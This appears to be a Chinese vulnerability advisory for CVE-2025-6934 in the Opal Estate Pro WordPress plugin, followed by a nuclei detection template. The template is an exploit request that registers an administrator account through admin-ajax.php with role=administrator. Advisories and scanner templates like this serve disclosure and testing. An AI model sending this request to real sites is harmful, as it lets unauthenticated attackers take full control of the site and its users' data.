The Opal Estate Pro – Property Management Unauthenticated Privilege Escalation Vulnerability

漏洞信息

漏洞名称: The Opal Estate Pro – Property Management Unauthenticated Privilege Escalation Vulnerability

漏洞编号:

  • CVE: CVE-2025-6934

漏洞类型: 权限提升

漏洞等级: 严重

漏洞描述: Opal Estate Pro是一款专为房地产管理设计的WordPress插件,广泛用于物业管理和房地产网站。该插件允许用户注册和管理物业列表,是房地产行业常用的工具之一。该插件在1.7.5及以下版本中存在一个严重的权限提升漏洞。漏洞的根源在于on_regiser_user函数中缺乏对用户角色的适当限制,使得未经认证的攻击者能够注册具有管理员权限的账户。这种漏洞的存在,使得攻击者无需任何认证即可创建管理员账户,从而完全控制受影响的网站。由于该漏洞允许攻击者绕过正常的认证流程,直接获得最高权限,因此对网站的安全性构成了极大的威胁。攻击者可以利用这一漏洞进行各种恶意操作,包括但不限于数据泄露、网站篡改、植入恶意代码等,对网站运营者和用户都可能造成严重的损失。

产品厂商: Opal Estate Pro

产品名称: The Opal Estate Pro – Property Management

影响版本: <= 1.7.5

来源: https://github.com/projectdiscovery/nuclei-templates/blob/7c78d2fb0e21a998fe665d55483a5378b0b5a5d2/http%2Fcves%2F2025%2FCVE-2025-6934.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2025-6934

info:
name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation
author: pussycat0x
severity: critical
description: |
The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation.Due to missing role restrictions in the on_regiser_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts
reference:
- https://github.com/Nxploited/CVE-2025-6934/blob/main/README.md
metadata:
verified: true
tags: cve,cve2025,wordpress,intrusive,plugin,opalestate

variables:
username: {{randstr}}
password: "{{to_lower(rand_text_alpha(8))}}"
email: "{{randstr}}@{{rand_base(5)}}.com"

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}

- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

username={{username}}&email={{email}}&password={{password}}&password1={{password}}&role=administrator&confirmed_register=on&opalestate-register-nonce=fada3a4581&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form


matchers:
- type: dsl
dsl:
- contains(body_2, 'status\":true')
- status_code_2 == 200
condition: and

extractors:
- type: regex
internal: true
group: 1
name: nonce
part: body
regex:
- 'name="opalestate-register-nonce" value="([a-f0-9]+)"'



The Opal Estate Pro – Property Management Unauthenticated Privilege Escalation Vulnerability
http://example.com/2025/07/17/github_2305076164/
作者
lianccc
发布于
2025年7月17日
许可协议